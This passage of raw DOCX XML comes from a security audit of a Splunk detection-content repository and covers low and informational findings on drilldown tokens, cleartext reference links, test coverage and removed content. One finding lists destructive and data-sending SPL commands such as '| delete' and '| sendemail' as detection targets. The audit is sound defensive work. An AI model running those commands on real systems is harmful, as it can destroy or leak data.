        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-09 — Drilldown tokens not produced by the detection search (102 dead pivots)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.3). Exploitability: Not exploitable (quality).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/endpoint/detect_empire_with_powershell_script_block_logging.yml:34-39; detections/cloud/aws_exfiltration_via_bucket_replication.yml:28,32 (+100 more)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: The drilldown substitutes a field the search doesn't yield, so the pivot resolves the token to empty and returns a useless/over-broad search. Low-impact UX/efficacy defect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (quality). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: align drilldown tokens with produced fields (rename </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the base search or change the drilldown to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$dest$</w:t>
      </w:r>
      <w:r>
        <w:t>); contentctl could validate drilldown tokens against the search's output field set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1078. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-13 — Cleartext http:// references and malformed references in shipped content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/cloud/aws_lambda_updatefunctioncode.yml:25; detections/web/web_remote_shellservlet_access.yml:25; detections/endpoint/windows_nirsoft_utilities.yml:39; stories/suspicious_dns_traffic.yml:11-12; stories/apache_struts_vulnerability.yml:9 (22 refs; 7 stories without references)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Cleartext-HTTP reference links (downgrade/MITM of a clicked link) and documentation hygiene. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated/yaml-spec/stories_spec.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is itself invalid YAML (fails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>safe_load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at line 43). No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> appears in any executable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data_source</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field — all attack_data URLs are HTTPS (see DET-14).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: upgrade refs to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, fix malformed narrative URLs, add missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>references</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, fix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stories_spec.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings</w:t>
      </w:r>
      <w:r>
        <w:t>: CWE-319 Cleartext Transmission (links); OWASP A02; NIST 800-53 SC-8; ISO 27001 A.8.24.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-319 Cleartext Transmission of Sensitive Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-8 Transmission Confidentiality and Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Communication Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-14 — 66 production detections validated only by disabled manual tests (attack_data provenance otherwise clean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Test-coverage gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/**/*.yml tests (e.g. detections/cloud/aws_multiple_users_failing_to_authenticate_from_ip.yml:61)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location / facts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: All </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2,154</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>attack_data.data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URLs point to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://media.githubusercontent.com/media/splunk/attack_data/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Git-LFS of the official splunk/attack_data repo) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, personal-repo, or S3 URLs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> confirms the single configured cache base. 2,056 tests are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>66 production detections carry `experimental`/"PORTED MANUAL TEST"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tests that do not run automatically (list in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scratchpad/work/det/out/rules/e_manual_or_experimental_test.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e.g. the cloud "previously unseen" family, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_multiple_users_failing_to_authenticate_from_ip.yml:61</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), i.e. shipped production logic validated only manually. 103 detections have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no `tests` key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — all are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status: experimental</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (102) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (1); no production detection lacks tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Good supply-chain hygiene on attack_data; the gap is 66 production detections whose automated test is disabled (coverage/regression risk). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: convert "PORTED MANUAL TEST" to runnable unit/integration tests or down-rank the detections to experimental; ensure CI fails if a production detection has only an experimental test. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings</w:t>
      </w:r>
      <w:r>
        <w:t>: CWE-1053 Missing Documentation / test gap; OWASP A09; NIST 800-53 SA-11; ISO 27001 A.8.29.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1053. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-11 Developer Testing and Evaluation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.IM Identify - Improvement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.29 Security testing in development and acceptance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-15 — Deprecated and removed content remains in tree; contentctl excludes it from live searches (positive control)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Not exploitable (correctly excluded).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/deprecated/ (3); removed/ (377)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Facts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/deprecated/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 3 files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status: deprecated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecation_info.removed_in_version: 6.8.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (current app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>6.6.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 377 files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status: removed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verified against contentctl 5.6.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RemovedSecurityContentObject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> narrows status to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and is collected into a deprecation mapping/lookup; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>savedsearches_detections.j2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> emits a single disabled default stanza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disabled = 1 ... search = | makeresults | eval text = "This search was removed..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for removed content, and deprecated detections ship with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DEPRECATED_TEMPLATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> banner and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. So removed/deprecated content is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shipped as runnable detections. The only occurrences of truly dangerous SPL verbs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| sendemail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| sendalert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| rest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| collect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| outputcsv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) are inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed/detections/splunk_command_and_scripting_interpreter_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed/detections/splunk_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — and even there they sit inside string literals of meta-detections (searches that *hunt for* risky SPL) or Splunk-internal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| rest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> introspection, not executed as destructive operations, and they are removed from the build regardless.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (inert; correctly excluded). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: optional repo hygiene — the physical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deprecated/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trees remain in the checkout; confirm the packaging step (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) excludes them so they are not redistributed. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings</w:t>
      </w:r>
      <w:r>
        <w:t>: OWASP A05; NIST 800-53 CM-2; ISO 27001 A.8.19.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
